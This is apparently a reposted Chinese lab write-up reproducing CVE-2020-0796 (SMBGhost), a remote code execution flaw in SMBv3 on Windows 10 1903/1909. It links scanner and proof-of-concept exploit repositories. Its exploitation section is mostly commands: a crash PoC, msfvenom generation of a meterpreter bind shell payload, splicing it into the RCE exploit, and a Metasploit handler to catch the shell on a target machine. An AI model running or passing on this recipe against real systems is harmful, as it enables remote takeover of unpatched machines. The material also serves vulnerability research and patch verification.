概述
攻击者可能利用此漏洞远程无需用户验证,通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,受攻击的目标系统只需开机在线即可能被入侵。从而获取机器的完全控制,利用端口445
影响版本:
漏洞主要影响Windows10版本(1903和1909),包括32位、64位的家用版、专业版、企业版、教育版
资源
检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
蓝屏EXP:https://github.com/eerykitty/CVE-2020-0796-PoC
RCE poc:https://github.com/chompie1337/SMBGhost_RCE_PoC
参考:https://blog.csdn.net/Eastmount/article/details/105350314
windows 10纯净版:(建议迅雷下载)
ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/
漏洞利用
靶机版本:Windows 10 Version 1903 for x64-based Systems
靶机IP:192.168.1.4
1.漏洞探测
奇安信检测工具适用于局域网批量检测,快速查找未打补丁的机器
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
2. POC 蓝屏
https://github.com/eerykitty/CVE-2020-0796-PoC
python CVE-2020.0796.py 192.168.1.12
3.RCE
https://github.com/chompie1337/SMBGhost_RCE_PoC
①payload生成
msfvenom -p windows/x64/meterpreter/bind_tcp lport=1234 -f py -o smb.py
②.将文件smb.py里面buf的值替换到exploit.py中
③ 运行POC
python3 exploit.py -ip 192.168.1.12
④MSF 开启监听
use exploit/multi/handlermsf5
set payload windows/x64/meterpreter/bind_tcp
set lport 1234lport => 1234
set rhost 192.168.1.12
run
⑤ 成功建立会话。监听端口后如果一直不弹shell,可重新运行一次
=============================================================================
最后
以上就是认真铅笔为你收集整理的【漏洞复现】CVE-2020-0796 SMBv3远程代码执行资源漏洞利用2. POC 蓝屏3.RCE的全部内容,希望文章能够帮你解决【漏洞复现】CVE-2020-0796 SMBv3远程代码执行资源漏洞利用2. POC 蓝屏3.RCE所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复